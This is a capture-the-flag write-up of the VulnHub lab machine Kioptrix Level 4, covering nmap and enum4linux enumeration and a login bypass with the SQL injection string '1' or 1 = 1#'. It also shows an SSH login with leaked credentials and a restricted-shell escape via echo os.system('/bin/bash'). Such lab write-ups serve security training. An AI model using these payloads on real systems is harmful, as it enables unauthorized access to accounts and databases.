menu

Kioptrix Level 4 Writeup

The goal is to get root access and retrieve the flag in the ‘root’ directory.

Kioptrix level 4 vulnhub link below:
Kioptrix Level 4 download page

1.1 Enumeration


A port scan reveals that 4 ports are open (22, 80, 139 and 445).

nmap -T4 -sV -A -oA nmap-scan 192.168.0.73
Nmap scan report for 192.168.0.73
Host is up (0.00027s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesnt have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 2h49m42s, median: 0s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-04-15T15:34:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)


1.2 SSH


SSH appears to not have any vulnerable versions. However, SSH could possibly have weak credentials.

1.3 HTTP Login with SQLI

The login page could potentially be vulnerbale to SQL Injection. To check for SQLI the following is entered:

Username: admin
Password: 1' or 1 = 1#

Login successful!

1.4 HTTP Testing for LFI


The URL has username=Admin. LFI is tested here. However, each file says ‘permission denied’. This appears to be a dead end.

1.5 SMB Enumeration

Enum4linux is run to attempt to enumerate users:



Several users are revealed:

-> nobody
-> robert
-> root
-> john
-> loneferret


The users can be further tested on the website and SSH.

2.1 Exploitation


An attempt is made to perform a dictonary attack over SSH against these usernames but that did not work. After that an attempt is made to login with the users enumerated on the login page. The ‘john’ user shows the password in plaintext! With a password of ‘MyNameIsJohn’.

Since SSH is open, a login attempt with SSH using the credentials collected is done which is successful! However, the shell appears to be low privileged with few commands.



After some research, i found a way to escape a restriced shell using the echo command to execute the following:

echo os.system('/bin/bash')

This successfully invokes a bash shell with the user id of ‘john’.

Found on this link: Escaping/Bypass From Jail/Restricted Linux Shells

3.1 Post Exploitation


I then changed directory to the root and found a ‘congrats.txt’ file which contained the flag!



When looking around the file system a SQL username and password is found in the ‘/var/www’ web server files. The login php file contains the following:


Username: root
There is no password for root.

When logging the mysql i was easily able to enumerate the databases.



The databses are:

-information_schema
-members
-mysql


After further enumeration of mysql, i was able to find the user accounts for the usernames ‘john’ and ‘robert’.



Success!

The flag has been retrived and the mysql database has been enumerated.